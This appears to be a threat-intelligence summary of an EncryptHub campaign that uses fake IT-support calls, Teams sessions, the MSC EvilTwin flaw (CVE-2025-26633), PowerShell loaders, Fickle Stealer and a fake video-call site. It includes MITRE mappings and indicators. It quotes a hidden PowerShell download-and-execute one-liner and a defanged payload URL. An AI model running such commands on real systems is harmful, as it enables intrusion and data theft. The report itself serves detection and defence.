When Hackers Call: Social Engineering, Abusing Brave Support, and EncryptHub’s Expanding Arsenal

Trustwave SpiderLabs details an EncryptHub campaign that uses social engineering, Teams-based remote access, and exploitation of CVE-2025-26633 (MSC EvilTwin) to load malicious .msc files and deploy payloads like Fickle Stealer. The actor also uses Golang tools (SilentCrystal, a SOCKS5 backdoor), Brave Support and rivatalk.net hosting for payload delivery and C2 communications. #EncryptHub #CVE-2025-26633

Keypoints

EncryptHub uses social-engineering calls and Microsoft Teams requests to establish remote sessions and run PowerShell loaders.
The campaign exploits CVE-2025-26633 (MSC EvilTwin) by placing a malicious .msc in an MUIPath en-US directory so mmc.exe loads it.
PowerShell runner.ps1 drops two .msc files, replaces an htmlLoaderUrl/URI placeholder with a C2 URL, and retrieves AES-encrypted commands from C2.
Build.ps1 establishes persistence, exfiltrates system info, and deploys Fickle Stealer to harvest files and crypto wallets.
New Golang tools include SilentCrystal (abuses Brave Support to host payloads and uses a mock “C:Windows ” directory) and a SOCKS5 backdoor supporting client/server modes.
A fake video-call platform (rivatalk.net) hosts a malicious installer (setup.msi) that sideloads userenv.dll and runs pay.ps1 to maintain encrypted C2 communications and hide activity with fake browser traffic.
Known IOCs and C2 URLs include cjhsbam[.]com, safesurf.fastdomain-uoemathhvq.workers[.]dev, and api.rivatalk[.]net with associated IP 185.33.86.220.

MITRE Techniques

[T1190] Exploit Public-Facing Application – CVE-2025-26633 (MSC EvilTwin) used to load a malicious .msc from MUIPath; quote: ‘mmc.exe first checks for a file with the same name in the MUIPath directory. It then loads and executes the malicious MSC file from the en-US directory.’
[T1598] Phishing for Information / User Execution via Social Engineering – Actors impersonate IT support, request Teams connections, and trick victims into running commands: ‘users receive convincing phone calls from someone posing as an IT support representative’ and run PowerShell.
[T1059.001] PowerShell – loaders invoke remote scripts and Execute (runner.ps1 build.ps1 and pay.ps1): quote: “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command ‘Invoke-RestMethod -Uri … | Invoke-Expression’”.
[T1105] Ingress Tool Transfer – Payloads are hosted and retrieved from external hosting (Brave Support, rivatalk.net, workers.dev): quote: ‘The malware then downloads the file from the provided Brave Support link and extracts its contents.’
[T1547.001] Boot or Logon Autostart Execution: Registry/Startup – Build.ps1 establishes persistence on the infected machine and maintains continuous communication with C2 (described as persistence mechanism in Build.ps1).
[T1041] Exfiltration Over C2 Channel – Build.ps1 collects and exfiltrates system information to EncryptHub C2 and receives AES-encrypted commands: quote: ‘Build.ps1 collects and exfiltrates system information to the EncryptHub C2 server… The script receives AES-encrypted commands from the attacker, decrypts them, and runs the payloads.’
[T1071.001] Web Protocols – C2 communications use HTTP/HTTPS endpoints (cjhsbam[.]com, safesurf.fastdomain-*.workers.dev, api.rivatalk[.]net) to retrieve payloads and send status: quote: ‘hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1’.
[T1566] Social Engineering – use of fake video conferencing platform (rivatalk.net) to lure victims and require access codes to obtain installers: quote: ‘rivatalk.net … impersonate a video conferencing platform … downloading the Windows application requires an access code’.
[T1106] Native API – DLL Side-Loading – setup.msi drops launcher.exe and ELAM installer to sideload a malicious userenv.dll which then executes PowerShell payloads: quote: ‘launcher.exe is abused to sideload a malicious DLL.’
[T1090] Proxy – SOCKS5 Proxy – Golang backdoor implements SOCKS5 tunneling in client and server modes to route traffic and provide C2 connectivity (described as SOCKS5 backdoor).

Indicators of Compromise

[Domain] C2 and hosting domains – cjhsbam.com, rivatalk.net (rivatalk.net used for fake video platform and C2).
[Domain] Workers/hosting domain – safesurf.fastdomain-uoemathhvq.workers.dev (retrieves payload pay.ps1) and api.rivatalk[.]net (C2).
[IP Address] C2-associated IP – 185.33.86.220 (observed hosting related infrastructure).
[File/Script] PowerShell loader and payload filenames – runner.ps1, build.ps1, pay.ps1 (used to drop .msc files and retrieve next-stage payloads).
[File] Installer and binaries – setup.msi, launcher.exe, userenv.dll (sideloaded malicious DLL), and mentions of WF.msc/Fickle Stealer (and additional payloads).